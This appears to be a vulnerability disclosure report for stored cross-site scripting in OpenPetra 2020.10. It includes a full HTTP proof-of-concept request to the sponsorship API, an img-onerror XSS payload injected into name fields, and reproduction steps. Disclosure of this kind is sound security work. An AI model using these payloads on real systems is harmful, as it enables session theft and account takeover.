Description

Multiple Stored XSS at openpetra 2020.10

Proof of Concept

// PoC.req
POST /api/serverMSponsorship.asmx/TSponsorshipWebConnector_MaintainChild HTTP/1.1
Host: demo.openpetra.org
Cookie: ASP.NET_SessionId=AEC44A33068E58B5DE583F3E; OpenPetraSessionID=b987029b-104f-45f1-aa29-339a49d0d55a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 287
Origin: https://demo.openpetra.org
Referer: https://demo.openpetra.org/SponsorShip/Children/MaintainChildren
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"APartnerKey":-1,"ASponsorshipStatus":"CHILDREN_HOME","AFirstName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AFamilyName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AGender":null,"ADateOfBirth":"null","AUserId":"","APhoto":"","new_photo":"","ALedgerNumber":"43","AUploadPhoto":false}

Step to Reproduct

Sponsorship

Goto Sponsorship choose to Add new child

At field First name and Surname input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

Partner

Goto Partner choose to Add new partner

At field Title , First name and Family name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when user goto Donations choose to Add new transaction and search Donor Key with name of partner

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.